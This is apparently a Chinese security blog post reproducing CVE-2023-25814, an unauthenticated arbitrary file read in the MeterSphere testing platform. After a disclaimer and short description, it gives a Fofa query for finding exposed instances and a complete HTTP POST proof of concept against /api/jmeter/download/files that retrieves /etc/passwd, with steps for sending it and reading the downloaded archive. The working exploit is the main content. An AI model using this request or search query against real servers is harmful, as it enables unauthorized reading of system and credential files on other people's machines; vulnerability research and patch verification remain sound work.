MeterSphere 任意文件读取漏洞(CVE-2023-25814)

MeterSphere 任意文件读取漏洞(CVE-2023-25814)

  • 免责声明
  • 漏洞描述
  • 漏洞影响
  • 漏洞危害
  • 网络测绘
    • Fofa: title="MeterSphere"
  • 漏洞复现
    • 1. 构造poc
    • 2. 发送数据包
    • 3. 查看文件

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞。

漏洞影响

MeterSphere

漏洞危害

未经允许的攻击者可通过该漏洞读取服务器配置信息,敏感文件等。

网络测绘

Fofa: title=“MeterSphere”

MeterSphere 任意文件读取漏洞(CVE-2023-25814)_第1张图片
MeterSphere 任意文件读取漏洞(CVE-2023-25814)_第2张图片

漏洞复现

1. 构造poc

POST /api/jmeter/download/files HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
Content-Length: 0

{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}

2. 发送数据包

MeterSphere 任意文件读取漏洞(CVE-2023-25814)_第3张图片
发送后会自动下载一个压缩包,里面的内容就是我们读取的文件内容

在这里插入图片描述

3. 查看文件

MeterSphere 任意文件读取漏洞(CVE-2023-25814)_第4张图片

你可能感兴趣的:(漏洞复现,metersphere,web安全,安全)